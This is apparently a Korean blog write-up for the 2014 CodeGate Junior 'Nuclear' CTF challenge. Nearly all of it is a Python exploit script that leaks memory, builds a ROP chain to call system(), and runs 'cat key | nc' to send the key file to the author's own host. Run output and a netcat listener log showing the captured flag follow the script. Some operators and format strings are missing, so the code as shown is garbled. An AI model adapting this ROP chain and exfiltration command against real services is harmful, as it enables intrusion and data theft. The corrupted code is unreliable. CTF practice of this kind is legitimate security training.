상세 컨텐츠

본문 제목

2014 CodeGate Junior PreQual - Nuclear [exploit]

0x10 정보보안/0x13 Write-Up

by sweetchip 2014. 2. 16. 14:32

본문

반응형




nuclear_d4f699f3dbb8aadf7c224aa57f57eb4c


from socket import *

from struct import *

import time


p = lambda x : pack("

up = lambda x : unpack("

ip = "192.168.0.109"

ip = "58.229.183.22"

port = 1129


s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))


launchcode = "in the end, i was there." # this is passkey


send_plt = 0x08048900

recv_plt = 0x080488e0

send_wrap = 0x08048a0d

recv_wrap = 0x08048a6f


mprotect_got = 0xb75f22b0

freespace = 0x0804b500


ppppr = 0x0804917c

pppr = ppppr 1

ppr = pppr 1

pr = ppr 1

r = pr 1


def leak_payload1():

payload = ""

payload = "1" * 500

payload = "/"

payload = "1" * 1000

return payload


def leak_payload2():

payload = ""

payload = "1."

payload = "1" * 500

payload = "/"

payload = "1" * 1000

return payload


def leak_setsock_got():

payload =""

payload = "A" * 0x20c

payload = "BBBB"


payload = p(send_wrap)

payload = p(ppr)

payload = p(4)

payload = p(0x0804b00c)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

return payload


def mpro_exploit(mprotect): # mprotect payload

payload =""

payload = "A" * 0x20c

payload = "BBBB"


payload = p(mprotect)

payload = p(pppr)

payload = p(freespace)

payload = p(3000)

payload = p(7)


payload = p(recv_wrap)

payload = p(pr)

payload = p(4)

payload = p(freespace)

payload = p(len(shellcode))


return payload


def sys_exploit(system):

payload =""

payload = "A" * 0x20c

payload = "BBBB"


payload = p(recv_wrap)

payload = p(pppr)

payload = p(4)

payload = p(freespace)

payload = p(len("cat key | nc 220.117.247.200 12071\x00"))


payload = p(system)

payload = p(pr)

payload = p(freespace)


payload = p(0x08048b5b)

return payload


#########################[START EXPLOIT]##############################

print s.recv(1024)

print s.recv(1024)

s.send("target\n")

print s.recv(1024)

s.send(leak_payload1() "\n") # try to leak

##################[End LEAK FILE NAME - 1]############################

print s.recv(4096)

print s.recv(4096)

s.send("target\n")

print s.recv(4096)

s.send(leak_payload2() "\n") # try to leak File name

##################[End LEAK FILE NAME - 2]############################

print s.recv(4096)

launchcode = s.recv(4096).split('\n')[0]

launchcode = launchcode[len(launchcode)-24:] # get launchcode

launchcode = "\n"

print "LEAKED NUCLEAR LAUNCH CODE IS : " launchcode

##################[End LEAK FILE NAME - 3]############################

s.send("launch")

print s.recv(4096)

s.send(launchcode)

print s.recv(1024)

s.send(leak_setsock_got())

print s.recv(1024)

time.sleep(1)

setsockopt = up(s.recv(1024)[0:4])

print hex(setsockopt)

print s.recv(1024)

##################[ End LEAK SETSOCK 'GOT' ]##########################

mprotect = setsockopt - 0x6810

system = setsockopt - 0xb2860

print hex(system)

#######################[ GOT SYSTEM PTR ]#############################

s.send(sys_exploit(system))

time.sleep(0.3)

s.send("cat key | nc 220.117.247.200 12071\x00")

time.sleep(0.3)

############################[ GET KEY ]###############################

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

##########################[ End Of File ]#############################

"""


"in the end, i was there." # this is passkey


######################################################################

:: Welcome to the Nuclear Control System ::



>

[ ] Enter coordinate of target, (Latitude/Longitude)

--->

[ ] Target coordinate setting completed.


> [!] Unknown command : 11111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111넁%P

> [!] Unknown command : 11111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111


>

[ ] Enter coordinate of target, (Latitude/Longitude)

--->

[ ] Target coordinate setting completed.


LEAKED NUCLEAR LAUNCH CODE IS : in the end, i was there.


[ ] Enter the passcode to launch the nuclear :

[ ] Correct passcode!


[2J[0;0H[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE




COUNT DOWN : 100

0xb76a8ac0L

[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE




COUNT DOWN : 99

0xb75f6260L


C:\Users\Administrator>


C:\Users\Administrator>nc -lvp 12071

listening on [any] 12071 ...

58.229.183.22: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.93] from (UNKNOWN) [58.229.183.22] 45227: NO_DATA

BUG_BOUNTIES_b3COM3_GrEAT

"""

# Key : BUG_BOUNTIES_b3COM3_GrEAT

##############################[ Result ]##############################


Key : BUG_BOUNTIES_b3COM3_GrEAT


처음에 mprotect로 시도하는데 잘 안되서 system으로 전환했더니 잘 된다.


이럴수가! [근데 cd80의 풀이를 보니 mprotect도 잘된는것 같았다... -_-]


반응형

관련글 더보기